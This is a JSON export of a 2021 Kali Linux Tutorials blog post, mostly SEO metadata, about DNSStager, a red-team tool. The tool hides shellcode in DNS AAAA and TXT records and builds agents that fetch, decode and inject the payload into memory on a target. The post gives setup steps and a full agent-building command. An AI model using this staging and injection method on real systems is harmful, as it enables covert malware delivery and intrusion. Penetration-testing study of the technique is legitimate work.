{"id":14895,"date":"2021-07-21T21:02:20","date_gmt":"2021-07-21T15:32:20","guid":{"rendered":"https:\/\/kalilinuxtutorials.com\/?p=14895"},"modified":"2021-07-21T21:02:20","modified_gmt":"2021-07-21T15:32:20","slug":"dnsstager","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/dnsstager\/","title":{"rendered":"DNSStager : Hide Your Payload In DNS"},"content":{"rendered":"\n<p><strong>DNSStager<\/strong> is an open-source project based on Python used to hide and transfer your payload using DNS.<\/p>\n\n\n\n<p>DNSStager will create a malicious DNS server that handles DNS requests to your domain and return your payload as a response to specific record requests such as&nbsp;<code>AAAA<\/code>&nbsp;or&nbsp;<code>TXT<\/code>&nbsp;records after splitting it into chunks and encoding the payload using different algorithms.<\/p>\n\n\n\n<p>DNSStager can generate a custom agent written in&nbsp;<code>C<\/code>&nbsp;or&nbsp;<code>GoLang<\/code>&nbsp;that will resolve a sequence of domains, retrieve the payload, decode it and finally inject it into the memory based on any technique you want.<\/p>\n\n\n\n<p>You can edit the code of DNSStager agent as you wish, and build it using your own custom execution techniques.<\/p>\n\n\n\n<p>The main goal of using DNSStager is to help red teamers\/pentesters to deliver their payloads in stealthy channel using DNS.<\/p>\n\n\n\n<p class=\"has-text-align-center has-vivid-green-cyan-background-color has-background\"><strong>How Does It Work?<\/strong><\/p>\n\n\n\n<p>Based on your DNS resolution option, DNSStager will split your payload into chunks and save each chunk of the payload as a response for a subdomain.<\/p>\n\n\n\n<p>For example, if you choose&nbsp;<code><strong>IPV6<\/strong><\/code>&nbsp;as your option to retrieve the payload, the DNS response will be something like:<\/p>\n\n\n\n<p><code><strong>cloud-srv-1.test.mydnsserver.live. 300 IN AAAA 5648:31d2:6548:8b52:6048:8b52:1848:8b52<\/strong><\/code><\/p>\n\n\n\n<p>Where&nbsp;<code><strong>5648:31d2:6548:8b52:6048:8b52:1848:8b52<\/strong><\/code>&nbsp;is a part of your payload.<\/p>\n\n\n\n<p>So, the agent will resolve some domains to retrieve the payload and then decode it and finally inject it into memory.<\/p>\n\n\n\n<p>Currently, DNSStager only supports two records,&nbsp;<code><strong>AAAA<\/strong><\/code>&nbsp;and&nbsp;<code><strong>TXT<\/strong><\/code>. You can encode your payload using XOR for the&nbsp;<code>AAAA<\/code>&nbsp;record and by default it will be encoded as base64 if you choose&nbsp;<code>TXT<\/code>&nbsp;record.<\/p>\n\n\n\n<p class=\"has-text-align-center has-vivid-green-cyan-background-color has-background\"><strong>DNSStager Key Features<\/strong><\/p>\n\n\n\n<p>DNSStager has some key features such as:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Hide and Resolve your payload in&nbsp;<code><strong>IPV6<\/strong><\/code>&nbsp;records.<\/li><li>Hide and Resolve your payload in&nbsp;<code><strong>TXT<\/strong><\/code>&nbsp;records.<\/li><li>XOR encoder to encode your payload.<\/li><li>Base64 encoder to encode your payload (only for TXT records).<\/li><li>Pure agent written in<strong>&nbsp;<code>C<\/code><\/strong>&nbsp;with the ability to customise it.<\/li><li>Pure agent written in&nbsp;<code><strong>GoLang<\/strong><\/code>&nbsp;with the ability to customise it.<\/li><li>The ability to use sleep between each DNS request.<\/li><li>AND MUCH MORE TO COME!<\/li><\/ul>\n\n\n\n<p class=\"has-text-align-center has-vivid-green-cyan-background-color has-background\"><strong>Requirements<\/strong><\/p>\n\n\n\n<p>You can install DNSStager python requirements via:<\/p>\n\n\n\n<p><code><strong>pip3 install -r requirements.txt<\/strong><\/code><\/p>\n\n\n\n<p>You need to install&nbsp;<code><strong>GoLang<\/strong><\/code>&nbsp;version&nbsp;<code>1.16.3<\/code>&nbsp;and to make sure to install the following&nbsp;<code><strong>GoLang<\/strong><\/code>&nbsp;packages:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>golang.org\/x\/sys<\/li><li>github.com\/miekg\/dns<\/li><\/ul>\n\n\n\n<p>Also, make sure to install&nbsp;<code><strong>ming-w64<\/strong><\/code>&nbsp;via:<\/p>\n\n\n\n<p><code><strong>apt install mingw-w64<\/strong><\/code><\/p>\n\n\n\n<p>The script&nbsp;<code><strong>setup.sh<\/strong><\/code>&nbsp;should do that for you, but double check the requirements before you use it!<\/p>\n\n\n\n<p class=\"has-text-align-center has-vivid-green-cyan-background-color has-background\"><a href=\"https:\/\/github.com\/mhaskar\/DNSStager#installation\"><\/a><strong>Installation<\/strong><\/p>\n\n\n\n<p>To get the latest version of DNSStager, make sure to clone it from this repo using the following command:<\/p>\n\n\n\n<p><code><strong>git clone https:\/\/github.com\/mhaskar\/DNSStager<\/strong><\/code><\/p>\n\n\n\n<p>Then you need to install the requirements using the following command:<\/p>\n\n\n\n<p><code><strong>pip3 install -r requirements.txt<\/strong><\/code><\/p>\n\n\n\n<p>And make sure to install all the previously mentioned requirements too.<\/p>\n\n\n\n<p>After doing all that, you are ready to execute DNSStager&nbsp;<strong>as root<\/strong>&nbsp;to get the following:<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>\u250c\u2500[askar@hackbook]\u2500[\/opt\/redteaming\/DNSStager]<br>\u2514\u2500\u2500\u257c $sudo .\/dnsstager.py<br>\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2591\u2588\u2588\u2588\u2557\u2591\u2591\u2588\u2588\u2557\u2591\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2591\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2591\u2588\u2588\u2588\u2588\u2588\u2557\u2591\u2591\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2591\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2591<br>\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2557\u2591\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2588\u2588\u2554\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2591\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557<br>\u2588\u2588\u2551\u2591\u2591\u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557\u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2588\u2557\u2591\u255a\u2588\u2588\u2588\u2588\u2588\u2557\u2591\u2591\u2591\u2591\u2588\u2588\u2551\u2591\u2591\u2591\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551\u2591\u2591\u2588\u2588\u2557\u2591\u2588\u2588\u2588\u2588\u2588\u2557\u2591\u2591\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d<br>\u2588\u2588\u2551\u2591\u2591\u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2551\u2591\u255a\u2550\u2550\u2550\u2588\u2588\u2557\u2591\u255a\u2550\u2550\u2550\u2588\u2588\u2557\u2591\u2591\u2591\u2588\u2588\u2551\u2591\u2591\u2591\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551\u2591\u2591\u255a\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u255d\u2591\u2591\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557<br>\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551\u2591\u255a\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2591\u2591\u2591\u2588\u2588\u2551\u2591\u2591\u2591\u2588\u2588\u2551\u2591\u2591\u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2551\u2591\u2591\u2588\u2588\u2551<br>\u255a\u2550\u2550\u2550\u2550\u2550\u255d\u2591\u255a\u2550\u255d\u2591\u2591\u255a\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d\u2591\u255a\u2550\u2550\u2550\u2550\u2550\u255d\u2591\u2591\u2591\u2591\u255a\u2550\u255d\u2591\u2591\u2591\u255a\u2550\u255d\u2591\u2591\u255a\u2550\u255d\u2591\u255a\u2550\u2550\u2550\u2550\u2550\u255d\u2591\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d\u2591\u2591\u255a\u2550\u255d<br>Beta Version Hide your payload in DNS<br>[-] Please specify a domain name using &#8211;domain<\/strong><\/p>\n\n\n\n<p class=\"has-text-align-center has-vivid-green-cyan-background-color has-background\"><strong>Usage<\/strong><\/p>\n\n\n\n<p>To start using DNSStager, make sure to setup your DNS settings first, you need to make your domain points to the DNSStager instance as&nbsp;<code><strong>NS record<\/strong><\/code>&nbsp;in order to handle all the DNS requests to your domain.<\/p>\n\n\n\n<p>You can read&nbsp;this full article&nbsp;about how to setup and use DNSStager.<\/p>\n\n\n\n<p>And you can check the options using&nbsp;<code><strong>-h<\/strong><\/code>&nbsp;switch like the following:<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>\u250c\u2500[askar@hackbook]\u2500[\/opt\/redteaming\/DNSStager]<br>\u2514\u2500\u2500\u257c $sudo .\/dnsstager.py -h<br>usage: dnsstager.py [-h] [&#8211;domain DOMAIN] [&#8211;payloads] [&#8211;prefix PREFIX]<br>[&#8211;payload PAYLOAD] [&#8211;output OUTPUT]<br>[&#8211;shellcode_path SHELLCODE_PATH] [&#8211;xorkey XORKEY]<br>[&#8211;sleep SLEEP]<br>DNSStager main parser<br>optional arguments:<br>-h, &#8211;help show this help message and exit<br>&#8211;domain DOMAIN The domain you want to use as staging host<br>&#8211;payloads show all payloads<br>&#8211;prefix PREFIX Prefix to use as part of your subdomain schema<br>&#8211;payload PAYLOAD Payload to use, see &#8211;payloads for more details<br>&#8211;output OUTPUT Agent output path<br>&#8211;shellcode_path SHELLCODE_PATH<br>Shellcode file path<br>&#8211;xorkey XORKEY XOR key to encode your payload with<br>&#8211;sleep SLEEP sleep for N seconds between each DNS request<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>&#8211;domain: you can use this option to select the main domain you will use to handle the DNS requests for.<\/li><li>&#8212; prefix: The prefix you want to use for the subdomain schema For example, if your main domain is<strong>&nbsp;<code>fakedns.live<\/code><\/strong>&nbsp;you can specify the prefix as &#8220;cdn&#8221; for example, So the generate domains will be a a pattern as the following:<ul><li><code><strong>cdn0.fakedns.live<\/strong><\/code><\/li><li><code><strong>cdn1.fakedns.live<\/strong><\/code><\/li><li><code><strong>cdnN.fakedns.live<\/strong><\/code><\/li><\/ul><\/li><\/ul>\n\n\n\n<p>Where&nbsp;<code><strong>N<\/strong><\/code>&nbsp;is auto generated number represent the number of chunks of your payload.<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>&#8211;payload: the DNSStager payload &#8220;agent&#8221; you want to generate based on the technique, programming language and architecture.<\/li><li>&#8211;output: Output path to save DNSStager executable payload &#8220;agent&#8221;.<\/li><li>&#8211;shellcode_path: Your&nbsp;<strong><code>raw<\/code>\/<code>bin<\/code><\/strong>&nbsp;shellcode path.<\/li><li>&#8211;xorkey: XOR key to encode the payload with.<\/li><li>&#8211;sleep: Used to sleep for N seconds between each DNS request.<\/li><\/ul>\n\n\n\n<p class=\"has-text-align-center has-vivid-green-cyan-background-color has-background\"><a href=\"https:\/\/github.com\/mhaskar\/DNSStager#dnsstager-payloads\"><\/a><strong>DNSStager Payloads<\/strong><\/p>\n\n\n\n<p>To check the available DNSStager payloads, you can use&nbsp;<code><strong>.\/dnsstager.py --payloads<\/strong><\/code>&nbsp;to get the following results:<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>\u250c\u2500[askar@hackbook]\u2500[\/opt\/redteaming\/DNSStager]<br>\u2514\u2500\u2500\u257c $sudo .\/dnsstager.py &#8211;payloads<br>[+] 6 DNSStager payloads Available<br>x64\/c\/ipv6 Resolve your payload as IPV6 addresses xored with custom key via compiled x64 C code<br>x86\/c\/ipv6 Resolve your payload as IPV6 addresses xored with custom key via compiled x86 C code<br>x64\/golang\/txt Resolve your payload as TXT records encoded using base64 compiled x64 GoLang code<br>x64\/golang\/ipv6 Resolve your payload as IPV6 addresses encoded with custom key using byte add encoding via compiled x64 GoLang code<br>x86\/golang\/txt Resolve your payload as TXT records encoded using base64 compiled x86 GoLang code<br>x86\/golang\/ipv6 Resolve your payload as IPV6 addresses encoded with custom key using byte add encoding via compiled x86 GoLang code<\/strong><\/p>\n\n\n\n<p class=\"has-text-align-center has-vivid-green-cyan-background-color has-background\"><strong>Example Of Using DNSStager With IPV6<\/strong><\/p>\n\n\n\n<p>This example will start DNSStager to resolve your payload as&nbsp;<code><strong>IPV6<\/strong><\/code>&nbsp;using the domain&nbsp;<code><strong>test.mydnsserver.live<\/strong><\/code>&nbsp;with prefix&nbsp;<code><strong>cloud-srv-<\/strong><\/code>&nbsp;to generate compiled&nbsp;<code><strong>x64 C<\/strong><\/code>&nbsp;agent encoded with 0x10 as key:<\/p>\n\n\n\n<p><code><strong>sudo .\/dnsstager.py --domain test.mydnsserver.live --payload x64\/c\/ipv6 --output \/tmp\/a2.exe --prefix cloud-srv- --shellcode_path ~\/payload.bin --sleep 1 --xorkey 0x10<\/strong><\/code><\/p>\n\n\n\n<p>And the output will be:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/1.bp.blogspot.com\/-8FBToAb2QLU\/YPT2s8jQiTI\/AAAAAAAAKFU\/GdSxfnaC70gZO2Ww0IiqyAIhx9ujkbdaQCLcBGAsYHQ\/s1770\/Starting-DNSStager-x64-ipv6.png\" alt=\"\"\/><\/figure>\n\n\n\n<p>And to check if everything is working well, lets send DNS query to&nbsp;<code>cloud-srv-0.test.mydnsserver.live<\/code>&nbsp;to get the following:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/1.bp.blogspot.com\/-8FBToAb2QLU\/YPT2s8jQiTI\/AAAAAAAAKFU\/GdSxfnaC70gZO2Ww0IiqyAIhx9ujkbdaQCLcBGAsYHQ\/s1770\/Starting-DNSStager-x64-ipv6.png\" alt=\"\"\/><\/figure>\n\n\n\n<p>We can see that we received&nbsp;<code><strong>f642:89ee:fae2:c20a:a0a:4b5b:4b5a:585b<\/strong><\/code>&nbsp;as response which is the first 16 bytes of our encoded payload.<\/p>\n\n\n\n<p>Then you can execute the agent&nbsp;<strong><code>\/tmp\/a2.exe<\/code>&nbsp;<\/strong>(as set in using &#8211;output in the command line) on the target machine and that will download all of the chunks required, decode them and inject them into memory for you.<\/p>\n\n\n\n<div class=\"wp-block-buttons is-content-justification-center is-layout-flex wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button is-style-outline is-style-outline--1\"><a class=\"wp-block-button__link has-vivid-cyan-blue-background-color has-background\" href=\"https:\/\/github.com\/mhaskar\/DNSStager\"><strong>Download<\/strong><\/a><\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS. DNSStager will create a malicious DNS server that handles DNS requests to your domain and return your payload as a response to specific record requests such as&nbsp;AAAA&nbsp;or&nbsp;TXT&nbsp;records after splitting it into chunks and encoding the payload using different [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":16969,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/1.bp.blogspot.com\/-cQpAXZAc-Bk\/YPT4sQIOvpI\/AAAAAAAAKFk\/2QeZAuGLDTopeNNk8FsqkqcGylEs9tU4ACLcBGAsYHQ\/s1041\/DNSStager%2B%25281%2529.png","fifu_image_alt":"DNSStager : Hide Your Payload In DNS","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[28],"tags":[891,917,2441],"class_list":["post-14895","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kali","tag-dns","tag-dnsstager","tag-payload"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>DNSStager : Hide Your Payload In DNS !!! Kali Linux<\/title>\n<meta name=\"description\" content=\"DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS. It will create a malicious DNS server.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/dnsstager\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"DNSStager : Hide Your Payload In DNS !!! Kali Linux\" \/>\n<meta property=\"og:description\" content=\"DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS. It will create a malicious DNS server.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/dnsstager\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2021-07-21T15:32:20+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/1.bp.blogspot.com\/-cQpAXZAc-Bk\/YPT4sQIOvpI\/AAAAAAAAKFk\/2QeZAuGLDTopeNNk8FsqkqcGylEs9tU4ACLcBGAsYHQ\/s1041\/DNSStager%2B%25281%2529.png\" \/>\n<meta name=\"author\" content=\"R K\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/1.bp.blogspot.com\/-cQpAXZAc-Bk\/YPT4sQIOvpI\/AAAAAAAAKFk\/2QeZAuGLDTopeNNk8FsqkqcGylEs9tU4ACLcBGAsYHQ\/s1041\/DNSStager%2B%25281%2529.png\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"R K\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/dnsstager\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/dnsstager\/\"},\"author\":{\"name\":\"R K\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\"},\"headline\":\"DNSStager : Hide Your Payload In DNS\",\"datePublished\":\"2021-07-21T15:32:20+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/dnsstager\/\"},\"wordCount\":1043,\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/dnsstager\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/1.bp.blogspot.com\/-cQpAXZAc-Bk\/YPT4sQIOvpI\/AAAAAAAAKFk\/2QeZAuGLDTopeNNk8FsqkqcGylEs9tU4ACLcBGAsYHQ\/s1041\/DNSStager%2B%25281%2529.png\",\"keywords\":[\"dns\",\"DNSStager\",\"Payload\"],\"articleSection\":[\"Kali Linux\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/dnsstager\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/dnsstager\/\",\"name\":\"DNSStager : Hide Your Payload In DNS !!! Kali Linux\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/dnsstager\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/dnsstager\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/1.bp.blogspot.com\/-cQpAXZAc-Bk\/YPT4sQIOvpI\/AAAAAAAAKFk\/2QeZAuGLDTopeNNk8FsqkqcGylEs9tU4ACLcBGAsYHQ\/s1041\/DNSStager%2B%25281%2529.png\",\"datePublished\":\"2021-07-21T15:32:20+00:00\",\"description\":\"DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS. It will create a malicious DNS server.\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/dnsstager\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/dnsstager\/#primaryimage\",\"url\":\"https:\/\/1.bp.blogspot.com\/-cQpAXZAc-Bk\/YPT4sQIOvpI\/AAAAAAAAKFk\/2QeZAuGLDTopeNNk8FsqkqcGylEs9tU4ACLcBGAsYHQ\/s1041\/DNSStager%2B%25281%2529.png\",\"contentUrl\":\"https:\/\/1.bp.blogspot.com\/-cQpAXZAc-Bk\/YPT4sQIOvpI\/AAAAAAAAKFk\/2QeZAuGLDTopeNNk8FsqkqcGylEs9tU4ACLcBGAsYHQ\/s1041\/DNSStager%2B%25281%2529.png\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"name\":\"Kali Linux Tutorials\",\"description\":\"Kali Linux Tutorials\",\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\",\"name\":\"Kali Linux Tutorials\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"contentUrl\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"width\":272,\"height\":90,\"caption\":\"Kali Linux Tutorials\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/CyberEdition\",\"https:\/\/www.threads.com\/@cybersecurityedition\",\"https:\/\/www.linkedin.com\/company\/cyberedition\",\"https:\/\/www.instagram.com\/cybersecurityedition\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\",\"name\":\"R K\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"caption\":\"R K\"},\"url\":\"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"DNSStager : Hide Your Payload In DNS !!! Kali Linux","description":"DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS. It will create a malicious DNS server.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kalilinuxtutorials.com\/dnsstager\/","og_locale":"en_US","og_type":"article","og_title":"DNSStager : Hide Your Payload In DNS !!! Kali Linux","og_description":"DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS. It will create a malicious DNS server.","og_url":"https:\/\/kalilinuxtutorials.com\/dnsstager\/","og_site_name":"Kali Linux Tutorials","article_published_time":"2021-07-21T15:32:20+00:00","og_image":[{"url":"https:\/\/1.bp.blogspot.com\/-cQpAXZAc-Bk\/YPT4sQIOvpI\/AAAAAAAAKFk\/2QeZAuGLDTopeNNk8FsqkqcGylEs9tU4ACLcBGAsYHQ\/s1041\/DNSStager%2B%25281%2529.png","type":"","width":"","height":""}],"author":"R K","twitter_card":"summary_large_image","twitter_image":"https:\/\/1.bp.blogspot.com\/-cQpAXZAc-Bk\/YPT4sQIOvpI\/AAAAAAAAKFk\/2QeZAuGLDTopeNNk8FsqkqcGylEs9tU4ACLcBGAsYHQ\/s1041\/DNSStager%2B%25281%2529.png","twitter_creator":"@CyberEdition","twitter_site":"@CyberEdition","twitter_misc":{"Written by":"R K","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kalilinuxtutorials.com\/dnsstager\/#article","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/dnsstager\/"},"author":{"name":"R K","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad"},"headline":"DNSStager : Hide Your Payload In DNS","datePublished":"2021-07-21T15:32:20+00:00","mainEntityOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/dnsstager\/"},"wordCount":1043,"publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/dnsstager\/#primaryimage"},"thumbnailUrl":"https:\/\/1.bp.blogspot.com\/-cQpAXZAc-Bk\/YPT4sQIOvpI\/AAAAAAAAKFk\/2QeZAuGLDTopeNNk8FsqkqcGylEs9tU4ACLcBGAsYHQ\/s1041\/DNSStager%2B%25281%2529.png","keywords":["dns","DNSStager","Payload"],"articleSection":["Kali Linux"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/kalilinuxtutorials.com\/dnsstager\/","url":"https:\/\/kalilinuxtutorials.com\/dnsstager\/","name":"DNSStager : Hide Your Payload In DNS !!! Kali Linux","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/dnsstager\/#primaryimage"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/dnsstager\/#primaryimage"},"thumbnailUrl":"https:\/\/1.bp.blogspot.com\/-cQpAXZAc-Bk\/YPT4sQIOvpI\/AAAAAAAAKFk\/2QeZAuGLDTopeNNk8FsqkqcGylEs9tU4ACLcBGAsYHQ\/s1041\/DNSStager%2B%25281%2529.png","datePublished":"2021-07-21T15:32:20+00:00","description":"DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS. It will create a malicious DNS server.","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kalilinuxtutorials.com\/dnsstager\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/dnsstager\/#primaryimage","url":"https:\/\/1.bp.blogspot.com\/-cQpAXZAc-Bk\/YPT4sQIOvpI\/AAAAAAAAKFk\/2QeZAuGLDTopeNNk8FsqkqcGylEs9tU4ACLcBGAsYHQ\/s1041\/DNSStager%2B%25281%2529.png","contentUrl":"https:\/\/1.bp.blogspot.com\/-cQpAXZAc-Bk\/YPT4sQIOvpI\/AAAAAAAAKFk\/2QeZAuGLDTopeNNk8FsqkqcGylEs9tU4ACLcBGAsYHQ\/s1041\/DNSStager%2B%25281%2529.png"},{"@type":"WebSite","@id":"https:\/\/kalilinuxtutorials.com\/#website","url":"https:\/\/kalilinuxtutorials.com\/","name":"Kali Linux Tutorials","description":"Kali Linux Tutorials","publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kalilinuxtutorials.com\/#organization","name":"Kali Linux Tutorials","url":"https:\/\/kalilinuxtutorials.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/","url":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","contentUrl":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","width":272,"height":90,"caption":"Kali Linux 